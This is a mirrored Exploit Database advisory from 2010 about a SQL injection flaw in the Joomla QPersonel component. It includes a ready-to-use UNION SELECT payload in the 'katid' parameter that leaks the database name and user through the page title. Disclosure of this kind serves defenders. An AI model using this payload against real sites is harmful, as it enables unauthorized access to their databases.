Joomla! Component QPersonel 1.0.2 – SQL Injection

• Exploit Database
• 16 阅读

• 作者： Valentin
  日期： 2010-04-13
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/12200/

• # Exploit Title: Joomla Component QPersonel SQL Injection Vulnerability
  # Date: 13.04.2010
  # Author: Valentin
  # Category: webapps/0day
  # Version: XSS security fix from 31.12.2009, 1.02 and before
  # Tested on: Debian Lenny, MySQL 5
  # CVE :
  # Code : 
  
  
  [:::::::::::::::::::::::::::::::::::::: 0x1 ::::::::::::::::::::::::::::::::::::::]
  |:: >> General Information 
  |:: Advisory/Exploit Title = Joomla Component QPersonel SQL Injection Vulnerability
  |:: By = Valentin Hoebel
  |:: Contact = valentin@xenuser.org
  |:: 
  |:: 
  [:::::::::::::::::::::::::::::::::::::: 0x2 ::::::::::::::::::::::::::::::::::::::]
  |:: >> Product information
  |:: Name = QPersonel
  |:: Vendor = Q-PROJE
  |:: Vendor Website = http://www.qproje.com/
  |:: Affected Versions = XSS security fix from 31.12.2009, 1.02 and before
  |:: 
  |:: 
  [:::::::::::::::::::::::::::::::::::::: 0x3 ::::::::::::::::::::::::::::::::::::::]
  |:: >> #1 Vulnerability
  |:: Type = SQL Injection
  |:: Vulnerable File(s) = qpersonel.php
  |:: Vulnerable Parameter(s) = katid
  |:: Example URL = index.php?option=com_qpersonel&task=qpListele&katid=XX+AND+1=2+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,concat(database(),user())--
  |:: Selected information gets displayed within the title tag.
  |:: 
  |:: 
  [:::::::::::::::::::::::::::::::::::::: 0x4 ::::::::::::::::::::::::::::::::::::::]
  |:: >> Additional Information
  |:: Advisory Published = 13.04.2010
  |:: 
  |:: 
  [:::::::::::::::::::::::::::::::::::::: 0x5 ::::::::::::::::::::::::::::::::::::::]
  |:: >> Misc
  |:: Greetz && Thanks = inj3ct0r team, Exploit DB, hack0wn and ExpBase!
  |::
  |:: 
  [:::::::::::::::::::::::::::::::::::::: EOF ::::::::::::::::::::::::::::::::::::::]